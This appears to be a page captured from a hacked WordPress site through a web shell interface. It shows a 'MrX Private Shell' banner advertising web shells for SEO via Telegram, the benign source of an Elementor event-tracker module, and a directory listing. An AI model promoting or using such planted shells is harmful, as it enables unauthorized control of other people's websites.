__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor\Core\Common\Modules\EventTracker;
use Elementor\Core\Base\Module as BaseModule;
use Elementor\Core\Common\Modules\EventTracker\Data\Controller;
use Elementor\Plugin;
use Elementor\Tracker;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Event Tracker Module Class
*
* @since 3.6.0
*/
class Module extends BaseModule {
public function get_name() {
return 'event-tracker';
}
/**
* Get init settings.
*
* @since 3.6.0
* @access protected
*
* @return array
*/
protected function get_init_settings() {
return [
'isUserDataShared' => Tracker::is_allow_track(),
];
}
public function __construct() {
// Initialize Events Database Table
$this->add_component( 'events-db', new DB() );
// Handle User Data Deletion/Export requests.
new Personal_Data();
Plugin::$instance->data_manager_v2->register_controller( new Controller() );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| data | Folder | 0775 |
|
|
| db.php | File | 4.76 KB | 0664 |
|
| module.php | File | 930 B | 0664 |
|
| personal-data.php | File | 1.95 KB | 0664 |
|